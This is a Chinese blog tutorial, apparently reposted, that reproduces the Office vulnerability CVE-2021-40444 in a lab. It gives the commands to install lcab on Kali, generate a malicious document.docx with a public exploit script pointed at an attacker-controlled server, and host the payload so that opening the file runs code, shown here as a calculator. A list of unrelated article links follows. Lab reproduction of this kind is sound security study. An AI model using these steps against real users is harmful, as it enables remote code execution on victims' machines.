本文的标题是《2021年的word文档还有漏洞,Office 1day CVE-2021-40444复现》来源于:由作者:陈鹏羽采编而成,主要讲述了项目地址在https://github.com/lo
项目地址在https://github.com/lockedbyte/CVE-2021-40444。先下载到kali里。
由于此项目必须使用lcab,所以我们先在kail里安装一下。
wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看帮助信息
lcab –help
进入下载后的CVE-2021-40444目录里,执行:
python3 exploit.py generate test/calc.dll http://<SRV IP>:3333
看见“You can execute now the server and then send document.docx to target” 说明就可以了。
然后用python开一个http服务,端口用刚刚设置的3333 或者自己设置的端口号。
sudo python3 exploit.py host 3333
把CVE-2021-40444目录里的子目录out下的document.docx文件copy到虚拟机中执行。
word打开后,可以看见这里在下载我们kali上的html文件。
html又会下载calc.cab 文件执行其中的命令,最后弹出计算器。
服务端显示的结果:
本文原作者为陈鹏羽,转载请注明:出处!如该文有不妥之处,请联系站长删除,谢谢合作~
原创文章,作者:陈鹏羽,如若转载,请注明出处:http://www.kaicen.cn/20220512315602.html
相关推荐
-
无需下载软件,用PPT制作微课,老师一学就会(ipad无需密码下载软件)
本文的标题是《无需下载软件,用PPT制作微课,老师一学就会》来源于:由作者:陈雪擂采编而成,主要讲述了作为一名老师,经常要将PPT做成视频课件,以便学生在课后观看复习;或者参加需要旁白讲解的微课比赛,
-
Word2013如何自动生成目录(word2013免费版)
在设置好页码的基础上,需要进行自动生成目录的工作,下面介绍一
-
浙大校庆微信头像(浙江大学海报图片)
前沿拓展: 浙大校庆微信头像 可能是遇到一些让自己忧伤的事情,换一下头像,换一种心情。 有时一个人的情绪变化,生活方式的改变,都会通过她的朋友圈或者聊天软件体现出来。比如心情好时会…
-
qq 头像 男生
前沿拓展: qq 头像 男生 这也太多了吧。去非主流网站找绝对找得到 阳光帅气耍酷男生头像 阳光帅气耍酷男生头像 阳光帅气耍酷男生头像 阳光帅气耍酷男生头像 阳光帅气耍酷男生头像 …
-
微信 聊天记录恢复
前沿拓展: 微信 聊天记录恢复 方法一:借助微信电脑端恢复 这个办法只需要借助一台电脑就可以完成。 步骤一:在电脑上下载微信电脑端并打开运行,登陆自己的微信账号。 步骤二:选择微信…
-
微信经常换头像的人性格(经常更换微信头像的人是什么性格)
前沿拓展: 微信经常换头像的人性格 多变 插图:电影《绿皮书》剧照 在互联网时代,社交媒体成为了人们联系的主要途径,尤其是微信,已经融入了我们的生活里,不管是学习、工作还是交友,我…
-
PowerPoint Online迎来新特性:设置背景格式(powerpoint是什么公司的产品)
今天,微软Office团队宣布Office Online在线
-
女孩子老是换微信头像(女生总换微信头像)
前沿拓展: 女孩子老是换微信头像 女生经常换微信头像,有两个意思。一个就是引起别人注意。另一个就是换一个头像换一种心情。 现在人人都有微信,头像放什么样的图片,就代表她是什么性格的…
-
Word打不开怎么办?Word文档打不开的解决办法(word打不开怎么办)
word文档打不开,相信很多人在日常的工作当中都有遇到过,w
-
WP8版Office 365 Admin正式版发布
近期IT管理员又将迎来一位新的小伙伴,当Office365服